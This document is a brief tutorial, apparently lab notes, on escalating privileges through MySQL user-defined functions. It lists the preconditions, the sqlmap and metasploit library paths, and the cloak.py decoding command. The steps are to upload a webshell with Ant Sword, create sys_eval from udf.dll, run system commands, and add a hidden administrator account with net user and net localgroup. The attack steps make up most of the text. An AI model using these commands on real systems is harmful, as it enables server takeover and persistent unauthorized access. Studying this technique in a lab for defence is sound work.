udf privilege escalation
udf = 'user defined function', that is, 'user-defined function'. It is to expand the function of MYSQL by adding new functions.
- how to get udf file
- Where to put the file to make mysql recognize this function
- function function
- Why can this thing be elevated (custom function instructions are run directly with administrator privileges )
premise
- SQL injection with high privileges
- secure_file_priv unlimited
- The plugin directory is writable
recurrent
Environment: kali, win7, phpstudy, mysql5.5.47
1. UDF position
/usr/share/metasploit-framework/data/exploits/mysql
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
Temporarily unavailable, need to decode
cd /usr/share/sqlmap/extra/cloak
python3 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
2. File path
MySQL<5.0, the export path is optional;
5.0 <= MySQL<5.1, you need to export to the system directory of the target server (eg: system32)
For versions above MySQL 5.1, you must put the udf.dll file in the lib\plugin folder in the MySQL installation directory to create custom functions.
select @@basedir; +lib/plugin/
Tips: Pay attention to the version of mysql here
Here use Ant Sword to upload the webshell
create function
create function sys_eval returns string soname 'udf.dll';
select sys_eval('whoami');
tips: Here you need to change the file name
Privilege escalation succeeded, administrator user
net user test test /add
net localgroup administrators test /add
function function
sys_eval executes arbitrary commands and returns the output.
sys_exec executes an arbitrary command and returns the exit code.
sys_get gets an environment variable.
sys_set creates or modifies an environment variable.